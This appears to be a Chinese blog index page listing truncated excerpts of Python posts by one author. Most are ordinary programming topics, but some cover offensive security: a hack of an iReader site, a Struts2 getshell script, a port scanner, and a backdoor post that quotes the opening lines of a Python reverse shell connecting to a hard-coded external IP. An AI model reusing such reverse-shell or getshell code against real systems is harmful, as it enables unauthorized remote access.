51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

经验分享

掌阅iReader某站Python漏洞挖掘

掌阅iReader某站Python漏洞挖掘

厉飞雨 阅读(22) 评论(0) 赞(2)

Python作为新一代的web开发语言,不少互联网公司内外网使用其开发站点。Python web周边还存在redis、memcached、mongod、supervisord等等服务,我们结合这些服务的一系列安全问题,将可以做很多有趣的事情。 目标端口开放了 6379、8080\~8086、8889、8079 首先,8080\~8086、8889都是web服务,而且是一个站...

python富文本XSS过滤器

python富文本XSS过滤器

厉飞雨 阅读(16) 评论(0) 赞(3)

前言:那天我正在开发网站最关键的部分------XSS过滤器,女神突然来电话说:"那东西好难呀,别开发了,来我家玩吧!"。我"啪"地一下把电话挂了,想让我的网站出XSS漏洞,没门\~ python做web开发当今已经逐渐成为主流之一,但相关的一些第三方模块和库还没有php和node.js多。 比如XSS过滤组件,PHP下有著名的&qu...

python编写断点续传下载软件

python编写断点续传下载软件

厉飞雨 阅读(19) 评论(0) 赞(4)

一年一度的python小程序编写系列之------断点续传下载软件。 [一、HTTP断点续传原理](#http) {#http} ----------------------------- 其实HTTP断点续传原理比较简单,在HTTP数据包中,可以增加Range头,这个头以字节为单位指定请求的范围,来下载范围内的字节流。如: [![QQ20150223-1@2x.png]...

python 实现 php 的 var_dump 功能

python 实现 php 的 var_dump 功能

厉飞雨 阅读(22) 评论(0) 赞(2)

最近在做python的web开发(原谅我的多变,好东西总想都学着。。。node.js也是),不过过程中总遇到些问题,不管是web.py还是django,开发起来确实没用php方便,毕竟存在的时间比较短,很多不完善的地方。 比如我在调试php中最常用的函数,var_dump,在python里找不到合适的替代函数。php中var_dump是一个特别有用的函数,它可以输出任何变量的...

python正向连接后门

python正向连接后门

厉飞雨 阅读(19) 评论(0) 赞(2)

python在linux下的反弹shell代码我相信很多人都见过: ``` import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("59.188.234.64",14575)) os.dup2(s.fileno(),0) os.du...

Python多线程端口扫描工具

Python多线程端口扫描工具

厉飞雨 阅读(21) 评论(0) 赞(1)

昨晚今晚写了两晚,总算把Py Port Scanner 写完了,姑且称之为0.1版本,算是一个Python多线程端口扫描工具。 水平有限,实话中间有一些困惑和不解的地方,代码可能也写的比较乱。有些问题并未找到很好的解决方法,还望大家谅解。速度大家自己试验,我感觉还行。 送上效果图两份,分别是扫单IP和扫IP段: [![03.jpg](http://static.51tbo...

struts2 S2-016/S2-017 Python GetShell

struts2 S2-016/S2-017 Python GetShell

厉飞雨 阅读(23) 评论(0) 赞(3)

之前在看PHP,要给协会写一个CTF,偶然看到乌云上发的最新struts2漏洞以及getshell,jsp我基本上也看不懂。折腾了一下,发现挺有意思,于是写一个python的脚本来自动化getshell吧\~ ......不知不觉已经快3点了...... <br /> <br /> ``` #coding : utf-8 __author__ =...

由python端口转发脚本看asyncore模块

由python端口转发脚本看asyncore模块

厉飞雨 阅读(21) 评论(0) 赞(2)

asyncore模块是封装过的处理socket事件的模块,在文档中搜索可以看到这样的说明: > Basic infrastructure for asynchronous socket service clients and servers. There are only two ways to have a program on a single processor d...

谈Python多线程及程序锁

谈Python多线程及程序锁

厉飞雨 阅读(21) 评论(0) 赞(0)

Python中多线程使用到Threading模块。Threading模块中用到的主要的类是Thread,我们先来写一个简单的多线程代码: ``` # coding : uft-8 __author__ = 'Phtih0n' import threading class MyThread(threading.Thread): def __init__...

python - 抓取页面上的链接

python - 抓取页面上的链接

厉飞雨 阅读(16) 评论(0) 赞(3)

除了C/C++以外,我也接触过不少流行的语言,PHP、java、javascript、python,其中python可以说是操作起来最方便,缺点最少的语言了。 前几天想写爬虫,后来跟朋友商量了一下,决定过几天再一起写。爬虫里重要的一部分是抓取页面中的链接,我在这里简单的实现一下。 *** ** * ** *** 首先我们需要用到一个开源的模块,requests。这不是py...